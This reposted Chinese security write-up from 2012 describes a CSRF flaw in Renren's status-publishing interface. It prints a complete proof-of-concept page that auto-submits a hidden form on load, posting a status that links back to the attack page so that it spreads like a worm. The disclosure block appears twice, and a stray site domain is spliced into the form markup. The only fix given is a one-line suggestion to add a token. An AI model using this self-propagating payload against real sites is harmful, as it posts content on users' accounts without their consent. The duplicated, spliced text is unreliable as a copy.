人人網(wǎng)CSRF漏洞曝光及修復方案
發(fā)布時間:2012-05-17 10:30:10 作者:佚名
我要評論

CSRF(Cross-site request forgery跨站請求偽造,也被稱成為“one click attack”或者session riding,通??s寫為CSRF或者XSRF,是一種對網(wǎng)站的惡意利用。盡管聽起來像跨站腳本(XSS),但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點內的信任用戶,而CSRF則通
腳本頁面http://bookman.sinaapp.com/doover.php,訪問該頁面后會發(fā)送一條狀態(tài)“已經(jīng)結束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”
詳細說明:
看了下那個鏈接的源代碼,是通過人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一個參數(shù)content到接口即可。
這個頁面post的content內容就是“已經(jīng)結束了,這是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>愛你的說</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
數(shù)字bookman愛你。歡迎訪問“肖寒Bookman”的人人空間。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.dbjr.com.cn value="1"/>
<p>raw: <input type="text" name="content" value="已經(jīng)結束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>

修復方案:
人人比我懂的多。以前有次flash的類似的,傳播是站內信吧。
補漏洞很簡單,加一個token驗證即可。
低級錯誤一枚,從網(wǎng)不行啊。
作者 leo108 AND 白熊一枚
詳細說明:
看了下那個鏈接的源代碼,是通過人人逛街的接口提交的。
接口地址http://j.renren.com/publisher/status,只要POST一個參數(shù)content到接口即可。
這個頁面post的content內容就是“已經(jīng)結束了,這是我的自白XXXX”。
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>愛你的說</title>
</head>
<body>
<iframe name="destination" width="0" height="0"></iframe>
數(shù)字bookman愛你。歡迎訪問“肖寒Bookman”的人人空間。
<div id="kokia" style="float:left;display:none;">
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" www.dbjr.com.cn value="1"/>
<p>raw: <input type="text" name="content" value="已經(jīng)結束了,這是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit" />
</form>
</div>
<script>
document.akiko.submit();
</script>
</body>
</html>

修復方案:
人人比我懂的多。以前有次flash的類似的,傳播是站內信吧。
補漏洞很簡單,加一個token驗證即可。
低級錯誤一枚,從網(wǎng)不行啊。
作者 leo108 AND 白熊一枚
相關文章
人人網(wǎng) iPhone版 V7.0.0 官方最新版
人人網(wǎng)是一款是基于人人網(wǎng)主體服務的免費應用軟件,專門為手機用戶設計。2013-11-26人人桌面 v4.0 中文綠色免費版 幫助用戶更方便的掛人人網(wǎng)的工具
人人網(wǎng)桌面版(原校內通)是一款面對在辦公室上網(wǎng)的白領、學生,以及人人網(wǎng)忠實用戶的軟件。具有:人人網(wǎng)新鮮事、好友狀態(tài)實時提醒,快速回復;即時通知收到的留言、評論、2013-05-24- MAC修改還原工具是吾愛網(wǎng)友開發(fā)的一款能夠隨機修改網(wǎng)卡物理地址的工具,當然了修改后還能進行恢復,整個修改過程不需要重啟修改,實時生效2023-08-11
- HSE365在線教育平臺app是由北京艾普數(shù)智科技有限公司開發(fā)的一款一站式數(shù)字化安全管理服務平臺,app基于“互聯(lián)網(wǎng)+安全生產(chǎn)”的先進思維和技術,旨在實現(xiàn)“讓安全成為一種習2025-04-01
- Wordpress寫個人博客的朋友越來越多同時想把寫的博客文章同步到其他的社交網(wǎng)站上,比如人人網(wǎng),接下來為大家介紹一招,感興趣的你可以參考下哈,或許可以幫助到你2013-03-11
人人網(wǎng)奧運屏蔽 關鍵詞 可以屏蔽奧運相關的關鍵詞 不喜歡奧運的人有福
不喜歡奧運的人可以用這個軟件2012-08-07- 人人桌面經(jīng)典版客戶端是人人網(wǎng)推出的官方桌面版客戶端,是人人網(wǎng)的官方增強軟件。人人桌面經(jīng)典版是官方提供的,適合習慣使用舊版的網(wǎng)友2014-07-02
- 人人網(wǎng)簡稱人人,它讓您更加方便的隨時隨地的與好友自由溝通。 在溝通的過程中,各位人人網(wǎng)友可千萬別忘了作息時間哦,下面小編就教你開啟打擾模式設置2014-08-02
- 人人網(wǎng)是一款很好用的社交平臺軟件,我們在使用人人溝通聊天時,如何屏蔽陌生人的消息呢?下面隨小編一起來看下人人屏蔽陌生人消息的具體操作吧。希望此篇教程能對大家有所2014-08-02
- 我們在使用人人溝通聊天時,如何屏蔽陌生人的消息呢?這是目前很多的人喜歡問的問題,本文帶來了詳細的教程2014-08-04